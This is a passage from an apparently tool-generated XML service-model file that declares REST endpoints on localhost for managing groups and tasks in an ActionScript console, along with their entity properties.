      <parameter name="strXml" type="string"/>
    </function>
    <function name="destroy_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/group/destroy</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group/destroy</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="add_user_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/group/add_user</item>
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group/add_user</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="create_" return-type="Group">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/group</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">updated_at,item_ids,_id,name,created_at,user_ids</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="del_user_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/group/del_user</item>
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group/del_user</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="alert_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/group/alert</item>
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group/alert</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
  </service>
  <entity name="Group">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Group</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBGroup</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="all_">
      <item name="propertySpecifier">updated_at,item_ids,_id,alert,name,created_at,user_ids</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.accounting.model</item>
    </annotation>
    <annotation name="create_">
      <item name="propertySpecifier">updated_at,item_ids,_id,name,created_at,user_ids</item>
    </annotation>
    <annotation name="show_">
      <item name="propertySpecifier">updated_at,item_ids,_id,name,created_at,user_ids</item>
    </annotation>
    <annotation name="update_">
      <item name="propertySpecifier">updated_at,item_ids,_id,name,created_at,user_ids</item>
    </annotation>
    <property name="alert" type="boolean" required="true"/>
    <property name="updated_at" type="string"/>
    <property name="item_ids" type="opaque[]"/>
    <property name="_id" type="string"/>
    <property name="name" type="string"/>
    <property name="created_at" type="string"/>
    <property name="user_ids" type="opaque[]"/>
  </entity>
  <service name="DBTask">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.task.rest</item>
      <item name="rootURL">https://localhost:4443</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.task.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="all_" return-type="opaque[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/task</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4443/task</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">total,desc,_id,stopped,resource,current,type,file_name</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="show_" return-type="Task">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/task/{id}</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4443/task/{id}</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">desc,_id,stopped,resource,current,type,file_name</item>
      </annotation>
      <annotation name="Properties">
        <item name="urlParamNames">id</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
        <item name="inputParamNames">id</item>
        <item name="inputParams">string</item>
      </annotation>
      <parameter name="id" type="string"/>
    </function>
    <function name="create_" return-type="Task">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/task/create</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4443/task/create</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">total,desc,_id,stopped,resource,current,type,file_name</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="destroy_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/task/destroy</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4443/task/destroy</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
  </service>
  <entity name="TaskResource">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Resource</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBTask</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.task.model</item>
    </annotation>
    <property name="_id" type="string"/>
    <property name="type" type="string"/>
  </entity>
  <entity name="Task">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Task</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBTask</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="create_">
      <item name="propertySpecifier">total,desc,_id,stopped,resource,current,type,file_name</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.task.model</item>
    </annotation>
    <annotation name="all_">
      <item name="propertySpecifier">total,desc,_id,stopped,resource,current,type,file_name</item>
    </annotation>
    <annotation name="show_">
      <item name="propertySpecifier">desc,_id,stopped,resource,current,type,file_name</item>
    </annotation>
    <property name="total" type="integer"/>
    <property name="desc" type="string"/>
    <property name="_id" type="string"/>
    <property name="stopped" type="boolean"/>
    <property name="resource" type="TaskResource"/>
    <property name="current" type="integer"/>
    <property name="type" type="string"/>
    <property name="file_name" type="string"/>
  </entity>
</model>
